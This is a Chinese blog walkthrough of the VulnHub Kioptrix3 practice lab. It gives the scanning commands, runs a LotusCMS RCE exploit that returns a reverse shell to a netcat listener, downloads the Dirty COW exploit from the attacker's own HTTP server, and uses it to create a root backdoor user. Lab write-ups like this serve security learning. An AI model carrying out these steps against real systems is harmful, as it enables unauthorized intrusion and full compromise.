首页 > 其他分享 >vulnhub KioptrixVM3 靶场练习

vulnhub KioptrixVM3 靶场练习

时间:2024-09-23 18:24:56浏览次数:12  
标签:kali 端口 KioptrixVM3 192.168 提权 vulnhub ip 靶机 靶场

靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar

一.安装

下载完虚拟机直接打开这个文件就可以

靶机的网络设为nat确保和kali一个网段

正常启动是这样

二.信息收集

kali的ip为:192.168.231.133

kali扫描ip

arp-scan -l

确定目标主机ip为192.168.231.183

端口扫描发现开放22,80端口

nmap -p- 192.168.231.183

目录扫描

dirsearch -u http://192.168.231.183

访问80端口看看

有个login登陆界面点开试试

发现该网站用LotusCMS搭建的

三.getshell

网上寻找该cms存在的exp

发现一个python语言的exp:GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit

下载到kali后

运行脚本构造payload

python lotucms.py -rh 192.168.231.183 -rp 80 -lh 192.168.231.133
-rh 为靶机ip  -rp为靶机端口  -lh为攻击机即kali的ip

kali再起一个监听,这里内置脚本是444端口不能使用其他端口

nc -lvvp 444

启动之后立刻收到监听

再变成交互式的shell

python -c 'import pty; pty.spawn("/bin/bash")'

获取到交互式shell

四.提权

使用命令uname -a查看靶机的内核版本信息为:Linux Kioptrix3 2.6.24-24-server

使用命令cat /etc/*-release查看靶机的发行版本信息为:Ubuntu 8.04.3 LTS

使用searchsploit查找符合内核版本和发行版本的历史漏洞

我们直接使用脏牛提权,该漏洞影响linux2.6.22 版本至 4.6 版本的所有 Linux 系统,该靶机linux内核为2.6.24符合区间。

脏牛提权

下载对应的exp到kali桌面

在kali桌面上打开命令提示符用python3起一个http服务

python3 -m http.server

在目标机上cd到tmp目录用 wget 192.168.231.133:8000/40839.c 下载exp

下载后使用命令编译

gcc -pthread 40839.c -o 40839 -lcrypt

然后 ./40839 运行

这里会让设置一个密码

设置一个后门密码,及创建的后门用户的密码

这里需要稍等一会按个回车出现命令行

查看/etc/passwd发现后门用户firefart被创建

切换用户 su firefart查看权限发现为root

成功提权

标签:kali,端口,KioptrixVM3,192.168,提权,vulnhub,ip,靶机,靶场
From: https://blog.csdn.net/2401_83378606/article/details/142316428

相关文章

  • VulnHub靶场笔记 - Breach: 2.1
    靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip一.安装下载后为压缩包文件解压后双击打开.ova文件根据压缩包里附带的说明我们需要将靶机的ip配为静态IP:192.168.110.151选择虚拟网络编辑器选择仅主机的网卡并将子网ip改为110网段点......
  • Web刷题之polarctf靶场(2)
    1.蜜雪冰城吉警店点开靶场,发现题目说点到隐藏奶茶(也就是第九杯)就给flag,但是明显就只有八杯,猜测大概率考的是前端代码修改把id=1修改为id=9,然后回到页面点击原味奶茶即可弹出flag#flag{7d43cc8863ad0ee649048e562fde53ec}2.召唤神龙打开靶场发现是一个游戏,爽......
  • 综合靶场 DC-1 通关详解
    一、环境搭建:1、靶机描述DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali......
  • Tomcat CVE-2017-12615 靶场攻略
    漏洞描述当Tomcat运⾏在Windows操作系统时,且启⽤了HTTPPUT请求⽅法(例如,将readonly初始化参数由默认值设置为false),攻击者将有可能可通过精⼼构造的攻击请求数据包向服务器上传包含任意代的JSP⽂件,JSP⽂件中的恶意代码将能被服务器执⾏。导致服务器上的数据泄露或获取服务......
  • Jboss CVE-2017-12149 靶场攻略
    漏洞简述该漏洞为Java反序列化错误类型,存在于Jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导致了漏洞漏洞范围JBoss5.x/6.x环境搭建cdvulhub-master/jboss/CVE-20......
  • KALI 靶场
    靶场一、dvwa镜像名称:sagikazarmark/dvwadockerpull sagikazarmark/dvwadockerrun-dit--name=dvwa-p10000:80sagikazarmark/dvwa靶场二、sqli-labs镜像名称:acgpiano/sqli-labsdockerpullacgpiano/sqli-labs......
  • DC-1靶场渗透
    信息收集寻找靶机真实IP扫描网段中有哪些主机在线,使用 -sP参数,不扫描端口,只扫描「存活主机」。本质上是Ping扫描,能Ping通有回包,就判定主机在线。namp-sp192.168.254.0/24探端口及服务nmap-A-p--v192.168.254.130-A综合性扫描 -v冗余模式发现开放了22、80......
  • 常见中间件漏洞靶场(tomcat)
    1.CVE-2017-12615开启环境查看端口查看IP在哥斯拉里生成一个木马访问页面修改文件后缀和文件内容放包拿去连接2.后台弱⼝令部署war包打开环境将前边的1.jsp压缩成1.zip然后改名为1.war访问页面进行上传在拿去连接3.CVE-2020-1938打开环境访问一下来......
  • 适合新手入门的靶场 TryHackMe
    对于不少喜欢网络安全的小伙伴,一直在很焦虑。如何学习网络安全,但由于各类平台和自身硬件等方面的限制。学习起来很吃力,故而本文为搭建分享一款在线靶场环境TryHackMe推荐理由对自身硬件没有太高的要求,有个浏览器就行了。支持THMAttackBox无需安装kali等系统,在浏览器直......
  • VulnHub-Narak靶机笔记
    Narak靶机笔记概述Narak是一台Vulnhub的靶机,其中有简单的tftp和webdav的利用,以及motd文件的一些知识靶机地址:https://pan.baidu.com/s/1PbPrGJQHxsvGYrAN1k1New?pwd=a7kv提取码:a7kv当然你也可以去Vulnhub官网下载一、nmap扫描1)主机发现sudonmap-sn192.168.84.0/24......